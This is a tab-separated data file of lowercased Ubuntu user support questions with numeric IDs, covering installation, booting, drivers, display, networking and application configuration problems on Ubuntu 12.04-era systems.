197324	zoneminder 404 upon installation	i 've run sudo apt-get install zoneminder on my clean install of ubuntu 12.04 . the installation downloaded about 120mb and there were no errors . i then typed sudo service zoneminder restart and i can see that it shuts down and starts up zoneminder successfully . i then navigate to http : //localhost and i see the default apache it works ! . i then navigate to http : //localhost/zm and i get a 404 . what have i done wrong ?
197327	recovery partition question	i have an acer aspire 4739 and want to install ubuntu but i was wondering what happens to the recovery partition if i ever wanted to go back to windows ? i do n't have a boot disk that laptop only have the recovery partition i think . so how would i install ubuntu without losing the partition ?
197328	copying root partition and /home to a new larger hard drive	i am getting a larger hard drive and would like to copy root directory to it . the partition for root is 20g . i would like to make it larger on the new drive . i also would like to copy /home to a larger partition on the new drive . could i use dd to copy the partition or is there a better way to copy the partition ? should i format the new drive before copying the partition ? what else will i need to do beside sudo update-grub to show i will be using the new drive ? i know it subjective but i 've found 20g a little low for a root partition if you add a lot of programs . would 40g be large enough or would a larger partition be better ?
197330	unity and windows xp guest in virtualbox conflicts on meta key	when i press the meta key in the xp guest ( to get the start menu ) , unity panel pops as well , pretty annoying , is there a way to solve it ?
197335	ca n't change display resolution on a lenovo g575	i 'm using ubuntu 12.04 on my lenovo g575 ( 64 bit ) . i was using my computer with the 1366x768 display resolution . i changed the display resolution of my computer to the 800x600 yesterday , then i tried to return it back to 1366x768 , but i could n't . when i try to change resolution , it 's getting dark and it crashes . then nothing happens . so i need to restart to open my computer . i used many methods which is written on the net to return the resolution back , but all these methods did n't work : ( note : when i create new user , the resolution for new user automatically is setting to 1366x768 and i can use this user . but i need to use my own user account . how can i solve the problem ? any ideas ?
197336	how to enable finger printer with thinkpad x230	i am a newbie with ubuntu and linux , and i just switched from windows 8 . i have installed 12.04 on my new lenovo thinkpad x230 . it seems everything else works perfectly except the finger printer . i have been using finger printer for a long time , and i really rely it on for my lastpass application . but i do n't know how to enable or install the driver of the finger printer . can anybody help me with this ? thanks in advance .
197342	how to install parallels workstation in ubuntu 12.04 ?	hello guys i have recently installed ubuntu 12.04 64bit on my pc and i wish to install parallels workstation ( virtual machine ) . i personally loved it cause i have used it on windows also . whats the methods to install parallels workstation on ubuntu : ( i have searched a lot but could n't find much . please help guys : ) regards
197344	google chrome says icedtea is out of date	icedtea for google chrome wo n't work . what happens is this - when i visit the java test page http : //www.java.com/en/download/testjava.jsp , chrome throws this : when i click update plug-in ... , it just redirects to icedtea 's website ! is there any way that i can update it so chrome does n't show the error ?
197346	add a scanned handwritten signature to an annotated pdf	how can i edit a pdf and also add my handwritten signature image which i have available as .gif , .jpg , or .xcf . i tried flpsed which is good for annotating pdf files but it does not seem to allow the importing of my handwritten signature image . i also tried the oracle pdf extension for open office on my libre office . the intention was to export as a pdf once the document was finalized . it complains that i do n't have the password to open the pdf . this is unexpected since flpsed and calibre do not ask for a password . i also tried calibre to convert the pdf to rtf , for the purpose of editing or annotating the rtf with open office . the intention was to export as a pdf once done . unfortunately , calibre did a very poor job of the conversion , leaving out the grid lines which are essential in many corporate or government forms . xournal was tried . it does not seem to have an `` import image '' type of feature . when i used the clipboard to paste an image , nothing happened . ( gimp 's copy to clipboard was the source used in this attempt . )
197350	how to start unity after boot into command line with `` text '' -option ?	i want my system to boot terminal only , but be able to launch unity once logged in . i 've edited /etc/default/grub from : grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash text '' and my system launches to the terminal fine , but when i try to launch unity i get : warning : no display variable set , setting it to : 0 compiz ( core ) - fatal : could n't open display : 0 everything goes back to normal when i restore the original grub configuration , so it looks to me like nothing is actually broken . i 'm running in a vm , and have now tested this with a clean install of ubuntu , as well as with the amahi installation i am trying to test . the same error occurs with the clean install . so how can i actually start unity after a system start that doens't start it directly ?
197352	how to install munin	dear 's i need to install munin on my ubuntu 12.04 for testing purposes but this is my first munin installation and i have no idea how to get this done . i followed some tuts but the lack the flow and are very hard . if someone out there had installed the munin please tell me how tho do this . what are the things need to be installed . is there server client configuration involved . please mods dont delete this thread . its important . it will be useful to anyone in future .
197357	upgrade two computers on the same wifi network from 12.04 to 12.10	i have two computers on the same wifi network at home . both run on ubuntu 12.04 and both will need to update to 12.10 shortly . there are some applications that are installed on one but not on the other and vice versa . but they share a large many applications . please indicate how can i upgrade both in such a way that : i download all the packages required on computer 1 move the downloaded packages to the other computer using external hd ( that is much quicker than over wifi ) then upgrade computer 1 then upgrade computer 2 -- after it downloads any packages that are not already available . also , i am a newbie and would be grateful if the process is simple and properly explained .
197360	flash animations does n't work	i have a following problem : i have ubuntu 12.04 installed on my athlon 1800+ + 1 gb ram + nvidia geforce4 mmx 440 ( pretty old configuration ) and everything works just fine except flash player in my web browser ( tried firefox and chromium ) . instead of movie/animation , i get blank space . i updated my system via update manager , checked the plugins ( everything ok ) , installed and updated flash player one more time , installed ubuntu restricted extras , tried firefox 's flash aid , even tried youtube html 5 ( still the same result ) ... please , help me ! i enjoy working with linux and ubuntu is the first that works for me well ( after open suse and fedora ) but i have no idea what is wrong now ...
197362	`` busybox initramfs '' prompt while attempting to install from live cd on 2nd hdd	i 've created a partition in ext3 on my second hdd to install linux . however , when i come to boot the cd , i get directed to a busybox prompt with no other choice than help . other topics i 've read on the subject where bound to the idea ubuntu has been already installed , and that the partition needs to be just indicated or else . but since i 've no ubuntu installed , neither have i any partition that ubuntu should consider like that . how can i go through that ? long version : the first time i 've run the live cd at boot , it run well until i decided to activate the integrity verification , then it started to load then i had the `` busybox '' prompt error . i 've reloaded a image , burnt it slowly , but then it occurs the same . i 'll be giving details about the hardware configuration soon .
197363	`` no manual entry for pthread '' - could not find man page by name	i am new to ubuntu , wanted to code for reader-writer block in operating system , but when i fired the command man pthread it gave me an error no manual entry for pthread . what can be done to resolve the problem ?
197367	make application automatically detect system language	what should an application developed under a linux system like ubuntu do so as to automatically detect the system language ? there are applications , like liferea that automatically change their language to match the system 's , without altering any preference of the program itself : should this be the `` default '' behavior for all the programs ? should there be an option on the program so as to let the user choose the language nonetheless ? are all these translations coming along with the program itself ? what if the user has set a system language not available in the translations of the program ? is this ubuntu or most-linux-distros specific ?
197373	wifi connected but no data transfer : âping : sendmsg : no buffer space availableâ	i have upgraded from 10.04 to 12.04 using system upgrade option . and since then , i am not able to use wireless . it ping for some 6 or 20 times and then throw this error : '' no buffer space available '' . i have seek online help and around as well . but nothing helped so far . i am not sure what is exactly missing . desperately expecting some reply .
197374	i added hibernate option in ubuntu 12.04 but not working	i created hibernate option using _ sudo gedit /var/lib/polkit-1/localauthority/50-local.d/hibernate.pkla and i added this in that file_ [ re-enable hibernate ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes but its not working . when i click on it , come to desktop page after some tym what need to do . is anything wrong ? disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x426556e7 device boot start end blocks id system /dev/sda1 * 63 81915434 40957686 83 linux /dev/sda2 81915496 625137344 271610924+ f w95 ext 'd ( lba ) /dev/sda5 81915498 255995774 87040138+ 7 hpfs/ntfs/exfat /dev/sda6 255995838 430076114 87040138+ 82 linux swap / solaris /dev/sda7 430076178 625137344 97530583+ 7 hpfs/ntfs/exfat total used free shared buffers cached mem : 2025828 1372148 653680 0 135104 772580 -/+ buffers/cache : 464464 1561364 swap : 4194300 0 4194300 # free total used free shared buffers cached mem : 2025828 864896 1160932 0 28972 380768 -/+ buffers/cache : 455156 1570672 swap : 4194300 79680 4114620
197378	two equal items in alternatives list	i want to have two jdks . the first one was installed a long time ago to /usr/lib/jvm/java-7-oracle/ . i installed the second version and executed following commands to add it to alternatives : red-planet @ laptop : ~ $ sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /opt/java_1.6.0_35/bin/java '' 2 update-alternatives : using /opt/java_1.6.0_35/bin/java to provide /usr/bin/java ( java ) in auto mode . red-planet @ laptop : ~ $ sudo update-alternatives -- install `` /usr/bin/javac '' `` javac '' `` /opt/java_1.6.0_35/bin/javac '' 2 update-alternatives : using /opt/java_1.6.0_35/bin/javac to provide /usr/bin/javac ( javac ) in auto mode . red-planet @ laptop : ~ $ sudo update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /opt/java_1.6.0_35/bin/javaws '' 2 update-alternatives : using /opt/java_1.6.0_35/bin/javaws to provide /usr/bin/javaws ( javaws ) in auto mode . and configured : there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /opt/java_1.6.0_35/bin/java 2 auto mode 1 /opt/java_1.6.0_35/bin/java 2 manual mode 2 /usr/lib/jvm/java-7-oracle/bin/java 1 manual mode press enter to keep the current choice [ * ] , or type selection number : why do i have two equal items in the list ?
197379	eog how to control delay between slides in a slideshow from command line ?	eog -- fullscreen -- slide-show $ ordner1/out/ in have in my /out folder animated gif files and i 'd like to show all files as a slide show . eog has a fix time between slides but my animations are longer . eog cut the animation in the middle an start the next one . how can i can control delay between slides in a slideshow from command line ?
197380	let nautilus use the same view for all folders ?	is it possible to let nautilus use same view ( icon/list/compact ) for all folders ? i did n't seem to find it in preference dialog
197384	unable to overscan at lower resolution with amd ati	i am running ubuntu 12.04 with the latest ati drivers installed . i have the catalyst option but i am unable to set overscan . my default resolution is 1920*1080 on 15inch display . i want to set it to a lower resolution . but on setting it to any lower resolution the display shrinks i.e i see black chopped off display on the left and on the right : ( really frustrating this , wasted hours on this already . i realized that this is referred to as overscan , but the ati catalyst administrative just does not allow me to set the option . can someone please through some light on this topic ?
197385	system can not boot when trying to install 12.04	i 'm trying to install ubuntu 12.04 for two days now . thats something pretty strange because normally thats done in about half an hour . it does n't boot whatever i try . i got several different types of not-booting until now . all without significant error messages . now that i 'm running out of ideas i thought maybe one of you is able to find my mistake . the boot info is at http : //paste.ubuntu.com/1265205/ if you need any other information i 'd be happy to provide it .
197391	xampp is not running on ubuntu	i have nginx , apache2 , xampp installed on ubuntu 12.04 nginx is running on port 80 first i stopped apache2 using /etc/init.d/apache2 stop now i started xampp using /opt/lampp/lampp restart i got : root @ maye : /opt/lampp/etc # /opt/lampp/lampp restart stopping xampp for linux 1.7.3a ... xampp : xampp-apache is not running . xampp : xampp-mysql is not running . xampp : xampp-proftpd is not running . xampp stopped . starting xampp for linux 1.7.3a ... xampp : another web server daemon is already running . xampp : another mysql daemon is already running . xampp : starting proftpd ... xampp for linux started . i know nginx is also running on same port so i changed the port number from 80 to 8008 in /opt/lampp/etc/httpd.conf but still when i 'm trying to run my application on port 8008 it is not working for me . kindly help me out ?
197399	problem internet connection ubuntu 12.04 server ( trough virtualbox )	my final goal is to access my web projects trough external network . so , i have : internet connection trough wireless router ( isp 's ips are internal , so and the ips which the router sets to my laptop too . i use dhcp on the router , not static ips ) ubuntu 12.04 desktop installed . virtualbox with ubuntu 12.04 server installed . while installation of ubuntu server , i'v choose to install ssh , tomcat server and web server . the problem is that i do n't know how to set a correct internet settings for ubuntu server . when i 'm ping google 's ip the response is : '' connect : network unreachable '' in virtualbox 's settings i 'm choose nat type , and for port forwarding : host ip : 192.168.0.1 with port 2222 guest ip : 192.168.0.102 with port 22 at least i want to be able to open my projects in the internal network , and then from an external network - the computers in the university . i think that i will have one more problem , because my ip 's are not real . but when i 'm able to open the projects from the internal network , then i will think about this problem . sorry for my bad english and if i 'm not explain my problem clearly .
197400	ubuntu installation does not detect windows 7	i was trying to install ubuntu 12.10 with an installed windows 7 . i was following all steps on page , but it just simply does not gives me option to click install them by side . it just tells that there were no os detected . after that i ran boot-repair and received the following log : boot info script 0.61.full + boot-repair extra info [ boot-info september 18th 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sda1 ends after the last sector of /dev/sda guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 206,847 204,800 efi system partition /dev/sda2 206,848 468,991 262,144 microsoft reserved partition ( windows ) /dev/sda3 468,992 1,228,802,047 1,228,333,056 data partition ( windows/linux ) /dev/sda4 1,228,802,048 1,953,523,711 724,721,664 data partition ( windows/linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 f41c-5f8a vfat /dev/sda3 44ceb0fbceb0e678 ntfs /dev/sda4 ced8b435d8b41e21 ntfs ================================ mount points : ================================= device mount_point type options /dev/sr0 /live/image iso9660 ( ro , noatime ) =============================== stderr messages : =============================== file descriptor 7 ( pipe : [ 5456 ] ) leaked on lvscan invocation . parent pid 7672 : bash file descriptor 8 ( pipe : [ 5456 ] ) leaked on lvscan invocation . parent pid 7672 : bash no volume groups found mdadm : no arrays found in config file or automatically additional information : =================== log of boot-repair 2012-10-07__12h13 =================== boot-repair version : 3.193-0ppa22~lucid boot-sav version : 3.193-0ppa39~lucid glade2script-gtk2 version : 0.0.1-0ppa4~lucid boot-sav-nonfree version : please connect internet . then close this window . /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found deb http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu lucid main /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu lucid main w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze/release.gpg could not resolve 'cdn.debian.net' w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze/main/i18n/translation-en.bz2 could not resolve 'cdn.debian.net' w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze/main/i18n/translation-en_us.bz2 could not resolve 'cdn.debian.net' w : failed to fetch http : //security.debian.org/dists/squeeze/updates/release.gpg could not resolve 'security.debian.org' w : failed to fetch http : //security.debian.org/dists/squeeze/updates/main/i18n/translation-en.bz2 could not resolve 'security.debian.org' w : failed to fetch http : //security.debian.org/dists/squeeze/updates/main/i18n/translation-en_us.bz2 could not resolve 'security.debian.org' w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze-updates/release.gpg could not resolve 'cdn.debian.net' w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze-updates/main/i18n/translation-en.bz2 could not resolve 'cdn.debian.net' w : failed to fetch http : //cdn.debian.net/debian/dists/squeeze-updates/main/i18n/translation-en_us.bz2 could not resolve 'cdn.debian.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/lucid/release.gpg could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/lucid/main/i18n/translation-en.bz2 could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/lucid/main/i18n/translation-en_us.bz2 could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/dists/lucid/release.gpg could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/dists/lucid/main/i18n/translation-en.bz2 could not resolve 'ppa.launchpad.net' w : failed to fetch http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/dists/lucid/main/i18n/translation-en_us.bz2 could not resolve 'ppa.launchpad.net' w : some index files failed to download , they have been ignored , or old ones used instead . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 63 not upgraded . warning : the following packages can not be authenticated ! os-uninstaller err http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/ lucid/main os-uninstaller all 3.18-0ppa13~lucid could not resolve 'ppa.launchpad.net' failed to fetch http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/pool/main/o/os-uninstaller/os-uninstaller_3.18-0ppa13~lucid_all.deb could not resolve 'ppa.launchpad.net' e : some files failed to download 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 63 not upgraded . warning : the following packages can not be authenticated ! boot-repair err http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/ lucid/main boot-repair all 3.193-0ppa22~lucid could not resolve 'ppa.launchpad.net' failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/pool/main/b/boot-repair/boot-repair_3.193-0ppa22~lucid_all.deb could not resolve 'ppa.launchpad.net' e : some files failed to download file descriptor 7 ( pipe : [ 5456 ] ) leaked on lvs invocation . parent pid 3520 : /bin/sh file descriptor 8 ( pipe : [ 5456 ] ) leaked on lvs invocation . parent pid 3520 : /bin/sh no volume groups found boot-repair is executed in live-session ( boot-repair-disk 18.07.2012 , squeeze , debian , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit initrd=/live/initrd2.img boot=live config quiet boot_image=/live/vmlinuz2 warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== os-prober : =================== blkid : /dev/sda1 : uuid= '' f41c-5f8a '' type= '' vfat '' /dev/sda3 : uuid= '' 44ceb0fbceb0e678 '' type= '' ntfs '' /dev/sda4 : uuid= '' ced8b435d8b41e21 '' type= '' ntfs '' /dev/loop0 : type= '' squashfs '' windows not detected by os-prober on sda3 . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util sfdisk does n't support gpt . use gnu parted . warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . presence of efi/microsoft file detected : /mnt/boot-sav/sda1/efi/microsoft/boot/bootmgfw.efi presence of efi/microsoft file detected : /mnt/boot-sav/sda1/efi/microsoft/boot/memtest.efi presence of efi/boot file detected : /mnt/boot-sav/sda1/efi/boot/bootx64.efi please report this message to yannubuntu @ gmail.com =================== dmesg | grep efi : bios is efi-compatible , and maybe setup in efi-mode for this live-session . =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , is-correct-efi , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda3 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda3 . sda4 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda4 . sda : gpt , no-bios_boot , has-correctefi , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata st1000lm024 hn-m ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 106mb 105mb fat32 efi system partition boot 2 106mb 240mb 134mb microsoft reserved partition msftres 3 240mb 629gb 629gb ntfs basic data partition 4 629gb 1000gb 371gb ntfs basic data partition error : /dev/sr0 : unrecognised disk label =================== parted -lm : byt ; /dev/sda:1000gb : scsi:512:4096 : gpt : ata st1000lm024 hn-m ; 1:1049kb:106mb:105mb : fat32 : efi system partition : boot ; 2:106mb:240mb:134mb : :microsoft reserved partition : msftres ; 3:240mb:629gb:629gb : ntfs : basic data partition : ; 4:629gb:1000gb:371gb : ntfs : basic data partition : ; error : /dev/sr0 : unrecognised disk label =================== mount : aufs on / type aufs ( rw ) tmpfs on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type tmpfs ( rw , mode=0755 ) tmpfs on /dev/shm type tmpfs ( rw , nosuid , nodev ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=620 ) /dev/sr0 on /live/image type iso9660 ( ro , noatime ) tmpfs on /live/cow type tmpfs ( rw , noatime , mode=755 ) tmpfs on /live type tmpfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) /dev/sda1 on /mnt/boot-sav/sda1 type vfat ( rw ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sda4 on /mnt/boot-sav/sda4 type fuseblk ( rw , allow_other , blksize=4096 ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : block bsg btrfs-control bus cdrom cdrw char console core cpu_dma_latency disk dvd dvdrw fd full fuse hidraw0 hidraw1 hidraw2 hidraw3 hidraw4 hpet initctl input kmsg log makedev mcelog md mem net network_latency network_throughput null port ppp psaux ptmx pts random rfkill rtc rtc0 scd0 sda sda1 sda2 sda3 sda4 sg0 sg1 shm snapshot sr0 stderr stdin stdout urandom usb v4l vga_arbiter video0 xconsole zero ls /dev/md : ls /mnt/boot-sav/sda3 : windows users temp information volume system games riot $ recycle.bin recovery ( x86 ) files program files program programdata perflogs pagefile.sys nvidia msocache msdia80.dll intel hiberfil.sys eclipse settings and documents config.msi bdr-ld01.mbr bdr-ld01 bdr-im01.gz bdr-cf01 bdr-bz01 bdlog.txt warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . =================== df -th : filesystem type size used avail use % mounted on aufs aufs 3.9g 8.3m 3.9g 1 % / tmpfs tmpfs 3.9g 0 3.9g 0 % /lib/init/rw udev tmpfs 3.9g 176k 3.9g 1 % /dev tmpfs tmpfs 3.9g 0 3.9g 0 % /dev/shm /dev/sr0 iso9660 339m 339m 0 100 % /live/image tmpfs tmpfs 3.9g 8.3m 3.9g 1 % /live/cow tmpfs tmpfs 3.9g 0 3.9g 0 % /live tmpfs tmpfs 3.9g 8.0k 3.9g 1 % /tmp /dev/sda1 vfat 96m 18m 79m 19 % /mnt/boot-sav/sda1 /dev/sda3 fuseblk 586g 140g 447g 24 % /mnt/boot-sav/sda3 /dev/sda4 fuseblk 346g 176m 346g 1 % /mnt/boot-sav/sda4 =================== fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders units = cylinders of 16128 * 512 = 8257536 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc3ffc3ff device boot start end blocks id system /dev/sda1 1 266306 2147483647+ ee gpt partition 1 does not start on physical sector boundary . efi detected . please check the options . =================== default settings recommended-repair this setting would reinstall the of . additional repair would be performed : unhide-bootmenu-10s fix-windows-boot =================== settings chosen by the user boot-info this setting will not act on the mbr . no change has been performed on your computer . see you soon ! please connect internet . then close this window . i would realy need help because i urgently need ubuntu .
197409	how do i import amazon mp3s with banshee and the new amazon cloud player ?	banshee 's amazon mp3 import extension until recently allowed seamless importing of songs purchased from amazon mp3 . it did this by a ) opening .amz files and using them to connect to and download the purchased files from amazon 's servers , and b ) using hooks in banshee 's built-in browser to automatically recognize and open the .amz files when clicked on in the browser . however , recently this functionality stopped working . banshee will display contacting server in the lower left hand corner for a little while and then stop . furthermore opening the amazon cloud player in the banshee browser or any other browser on a linux system to manually download the .amz file now results in the message : on linux systems , cloud player only supports downloading songs one at a time . to download your music , deselect all checkboxes , select the checkbox for the song you want to download , then click the `` download '' button . how can i get around this and import my purchased music into banshee as i used to ?
197412	backup /etc/ as normal user deja dup ?	i want a normal ( no sudo ) user to be able to backup /etc/ and their home directory using deja dup . currently the home folder backup goes fine , but due to lack of permissions /etc does not get backed up . is there a way to create a new group , say 'backupers ' add the user to it , and then edit visudo to allow the group 'backupers ' to use deja dup to perform such backups ? at the moment the user can look at files in /etc/ ( say with gedit ) but ca n't modify , and that is the way i would like it to stay . but them making a backup is handy .
197418	how do i configure an intel hd graphics 4000 ?	first off , please note that last night i already posted this question to a launchpad mailing list , so this could be considered a cross post . however , i think this is a better place to ask the same question the question : how can i configure my ubuntu 12.04 , with upgraded kernel ( 3.6 ) , to use the intel hd graphics 4000 adapter ? ( intel hd 4000 is the standard of 3rd gen intel core i7 ( ivy bridge ) graphics adapter ) for me this is the first step to getting things working with the 2 video cards the system has ( one is in the docking station ) . if at all possible , i would like to use both adapters ( see below ) . apparently someone got that working on a predecessor model , but i ca n't seem to adapt that information to be useful for my system . so eventually , i want to use all the computing power of all adapters that are connected , and be able to connect external displays to any adapter . i do not want to lock to the intel adapter . system details i do get an x desktop on this laptop . however , dragging windows around and other animations look terrible . the system has two graphics adapters , the second one is an amd radeon hd 6700m in a laptop docking station . it does n't matter whether i boot with/without the docking station connected , the x desktop i 'm getting is on the built-in screen only and always looks the same . below , you 'll find some x logs . some output : $ glxinfo name of display : :0 x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 $ cat /etc/x11/xorg.conf this is probably the farthest from what it should be section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection $ lspci i only listed the lines i think are relevant . if you want more info in order to help me , please comment : ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 16:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler xt [ amd radeon hd 6700m series ] 16:00.1 audio device : advanced micro devices [ amd ] nee ati turks hdmi audio [ radeon hd 6000 series ] logs booting without the dock yields the following logs : ( apparently i can not add more than 2 links ) [ xorg.0.log ] [ 3 ] http : //pastebin . com/umsxlkjy [ xorg.0.log.old ] [ 4 ] http : //pastebin . com/krk3s1bj booting with the dock : [ xorg.0.log ] [ 5 ] http : //pastebin . com/x2xrq4ne [ xorg.0.log.old ] [ 6 ] http : //pastebin . com/q2ycb7j3 drivers the additional drivers dialog shows the following entries : ati radeon ( activated ; present when booted with the dock ) ati/amd proprietary fglrx graphics driver ( not activated ; present when booted with the dock ) '' ati/amd proprietary fglrx graphics driver ( post-release updates ) '' ( not activated ; present when booted with the dock ) usb video class driver ( activated )
197419	how to update code : :blocks to the latest version	i am using ubuntu 10.04 . i have installed code : :blocks , because i have read many good comments about it . but i have a problem : the code : :blocks i installed was n't the latest version , because i used apt-get install to download it . so here is my question : how can i update code : :blocks to the latest version from the terminal ( if it 's possible ) .
197421	gparted does n't start when i click gparted icon	i am using ubuntu 12.04 and i have noticed that sometimes application does n't start even after clicking the icon , what might be the problem . for example when i try to open gparted through the unity even after providing the correct password it does n't show up but when i try to open through the terminal sudo gparted it opens up nicely after providing the password .
197423	copy songs from ipod ?	i 've found a lot on the web about being able to manage your ipod through ubuntu . is it possible to take songs off the ipod onto disk in a usable form , as my song drive has crashed1 and that 's the only back up i have . the closest question i found has the answer using gtkpod ( same with this one ) , but looking in the software centre reviews , that seems busted in 12.04 and i do n't want to throw something buggy at my ipod . if it makes a difference , it 's an ipod classic . 1yes , i know i should have been taking regular back ups to either the cloud or another disk .
197430	keyboard issues in ubuntu 12.04	my ubuntu wireless keyboard is being really weird and i am unable to figure out what 's happening . i am using ubuntu 12.04 precise and today i noticed that webpages was refreshing after i hit the ctrl key . after digging around i also noticed that pressing 5 causes the keyboard to write 54 , also 6 writes 67 . i have tried several languages and restarting the desktop but no luck . any experienced this issue before . thanks
197431	gsettings key not listed in dconf	i wonder why in my beta of 12.10. the gsettings key com.canonical.indicator.session is not listed in dconf-editor . i can switch the value via : gsettings set com.canonical.indicator.session suppress-logout-restart-shutdown true but can not edit via dconf . that 's strange for i remember having altered it via dconf in 12.04
197435	booting ubuntu 12.04 from usb , how to save data ?	i am using a 4gb usb to boot ubuntu 12.04 . it worked successfully , but after a reboot all of my data was gone and all the programs reverted back to their default . i did set a persistence thingy when i created it using the bootable usb creator tool . any help would be greatly appreciated ! : )
197438	how do i preload a program for faster start ?	is it possible to `` preload '' ( actually not preload , but kinda emulate the startup ) e.g . nautilus ( or firefox ) startup at login , so the first time i launch it myself it launches faster ? probably to start it on another desktop and close after some seconds ?
